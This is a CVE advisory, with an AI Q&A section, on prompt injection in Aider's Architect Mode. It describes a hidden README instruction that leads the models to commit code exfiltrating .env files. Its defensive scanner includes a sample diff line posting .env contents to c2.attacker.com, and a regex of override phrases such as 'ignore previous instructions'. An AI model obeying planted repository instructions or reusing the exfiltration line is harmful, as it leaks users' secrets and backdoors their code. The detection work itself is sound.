CVE-2026-10175
Received - Intake
Code Injection in Aider AI Architect Mode

Publication date: 2026-05-31

Last updated on: 2026-05-31

Assigner: VulDB

Description
A security flaw has been discovered in Aider-AI Aider 0.86.3. It affects the function editor_coder.run in the file auth.py of the Architect Mode component. Manipulation leads to code injection. The attack can be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Meta Information
Published: 2026-05-31
Last Modified: 2026-05-31
Generated: 2026-05-31
AI Q&A: 2026-05-31
EPSS Evaluated: N/A
Affected Vendors & Products
Vendor | Product | Version / Range
aider-ai | aider | 0.86.3
CWE ID | Description
CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in Aider-AI Aider version 0.86.3, specifically in the Architect Mode component's editor_coder.run function within the auth.py file. It allows an attacker to perform code injection remotely by exploiting a flaw in how the system processes input from a repository's README.md file.

The issue arises because the architect model's output is passed directly to the editor model without proper input sanitization. An attacker can insert a hidden 'ARCHITECT OVERRIDE' instruction in the README.md file, causing the architect model to generate malicious code, such as importing modules to exfiltrate sensitive files like .env.

This malicious code is then committed back into the repository by the editor model, effectively backdooring the codebase. The vulnerability bypasses the usual input validation layer due to the use of 'preproc=False' in the editor's run method, which disables critical input sanitization.


How can this vulnerability impact me?

This vulnerability can lead to unauthorized code injection into your codebase, allowing attackers to insert backdoors or malicious functionality.

An attacker can exfiltrate sensitive information, such as environment variables (.env files), which may contain secrets, credentials, or configuration data.

Because the malicious code is committed with normal-looking commit messages, it can be difficult to detect, potentially compromising the integrity and security of your software.

Remote exploitation means attackers do not need local access, increasing the risk of widespread attacks if the repository is publicly accessible.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for suspicious commits that include unexpected or malicious code injections, especially in the auth.py file within the Architect Mode component. Since the exploit involves injecting malicious import statements and backdoored code through manipulated README.md files, inspecting recent commits for unusual code patterns or unexpected external network calls is recommended.

You can use git commands to review recent commits for suspicious changes, for example:

  • git log -p -- auth.py
  • git diff HEAD~1 HEAD -- auth.py
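
The commit review described above can be automated. The following is an added example, not code from the Aider project or from this advisory: it parses `git log -p` output and reports only lines that a commit added to a watched file. The rule patterns, the sample commit hash and the sample diff are constructed assumptions.

```python
import re

# Heuristic rules (assumptions for this example; tune them to your code base).
RULES = {
    "network-import": re.compile(
        r"^\s*(?:import|from)\s+(requests|urllib|http\.client|socket|httpx|aiohttp)\b"),
    "secret-file-read": re.compile(r"open\(\s*['\"][^'\"]*\.env['\"]"),
    "outbound-url": re.compile(r"https?://[^\s'\")]+"),
}

def scan_patch(patch_text, watched=("auth.py",)):
    """Return (commit, path, rule, line) for risky lines ADDED to watched files."""
    findings, commit, path, in_hunk = [], None, None, False
    for raw in patch_text.splitlines():
        if raw.startswith("commit "):
            commit, in_hunk = raw.split()[1][:12], False
        elif raw.startswith("diff --git "):
            path, in_hunk = None, False
        elif not in_hunk and raw.startswith("+++ "):
            # "+++ b/<path>" names the post-image; /dev/null means a deletion
            path = raw[6:] if raw.startswith("+++ b/") else None
        elif raw.startswith("@@"):
            in_hunk = True
        elif in_hunk and raw.startswith("+") and path \
                and path.rsplit("/", 1)[-1] in watched:
            added = raw[1:]
            for rule, rx in RULES.items():
                if rx.search(added):
                    findings.append((commit, path, rule, added.strip()))
    return findings

# Constructed sample of `git log -p -- auth.py` output with a harmless-looking message.
SAMPLE = """\
commit 0123456789abcdef0123456789abcdef01234567
Author: dev <dev@example.com>

    Refactor auth helpers for readability

diff --git a/auth.py b/auth.py
--- a/auth.py
+++ b/auth.py
@@ -1,3 +1,5 @@
 import hashlib
+import requests
 def check(user, pw):
+    requests.post("https://c2.attacker.com/x", data=open(".env").read())
     return hashlib.sha256(pw.encode()).hexdigest()
"""

if __name__ == "__main__":
    for finding in scan_patch(SAMPLE):
        print(*finding, sep=" | ")
```

To scan a real repository, pass the text of `git log -p -- auth.py` to `scan_patch` in place of `SAMPLE`.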

Additionally, scanning for network traffic that attempts to reach suspicious external URLs (such as attacker-controlled domains) can help detect exploitation attempts.

Use network monitoring tools or commands like tcpdump or Wireshark to filter for unusual outbound HTTP requests, e.g.:

  • tcpdump -i any -n host c2.attacker.com

What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include preventing the execution of untrusted architect output as editor input without proper validation. Specifically, avoid using the editor_coder.run function with preproc=False, as this disables critical input sanitization.

Review and sanitize any repository content that can influence the architect model, such as README.md files, to ensure they do not contain malicious instructions like "ARCHITECT OVERRIDE".

Monitor and audit commits for unexpected changes, especially those that introduce suspicious import statements or network calls.

If possible, restrict or disable Architect Mode until a patch or official fix is released by the project.
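
One way to review repository content before it reaches the architect model, as an added example that is not part of Aider or of this advisory: it audits README text for model-directed phrases, HTML comments and invisible characters. The advisory names only the "ARCHITECT OVERRIDE" marker; the other phrases and the assumption that the instruction hides in comments or zero-width characters are illustrative, and the sample README is constructed.

```python
import re
import unicodedata

# "ARCHITECT OVERRIDE" comes from the advisory; the other phrases are assumed examples.
DIRECTIVES = re.compile(
    r"architect\s+override|ignore\s+(?:all\s+)?previous\s+instructions|system\s+prompt",
    re.IGNORECASE)
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.DOTALL)

def is_format_char(ch):
    """Unicode category Cf covers zero-width and bidi control characters."""
    return unicodedata.category(ch) == "Cf"

def audit_readme(text):
    """Report what a human reading the rendered README would not see."""
    report = {
        "directives": [],       # line numbers with model-directed phrases
        "hidden_comments": [],  # HTML comment bodies (not rendered by Markdown viewers)
        "invisible": sorted({f"U+{ord(c):04X}" for c in text if is_format_char(c)}),
    }
    # Drop invisible characters first so a marker split by them still matches.
    visible = "".join(c for c in text if not is_format_char(c))
    for number, line in enumerate(visible.splitlines(), 1):
        if DIRECTIVES.search(line):
            report["directives"].append(number)
    for match in HTML_COMMENT.finditer(visible):
        body = " ".join(match.group(1).split())
        if body:
            report["hidden_comments"].append(body[:80])
    return report

# Constructed sample: the marker sits in a comment and is split by U+200B.
SAMPLE_README = (
    "# Demo project\n"
    "Run `make test` before sending a patch.\n"
    "<!-- ARCHI\u200bTECT OVERRIDE: (constructed placeholder instruction) -->\n"
    "License: MIT\n"
)

if __name__ == "__main__":
    print(audit_readme(SAMPLE_README))
```

A non-empty report is a prompt for manual review rather than proof of tampering, since legitimate READMEs also contain HTML comments.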


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows remote code injection through manipulation of the architect mode in Aider-AI Aider, potentially leading to unauthorized code execution and data exfiltration, such as leaking sensitive files like .env. This kind of security flaw can compromise the confidentiality and integrity of data handled by the system.

Such a compromise could negatively impact compliance with data protection regulations like GDPR and HIPAA, which require strict controls to protect personal and sensitive information from unauthorized access or disclosure.

Because the vulnerability enables attackers to inject malicious code that can exfiltrate sensitive data, organizations using the affected software may face increased risk of data breaches, potentially leading to regulatory violations and associated penalties.

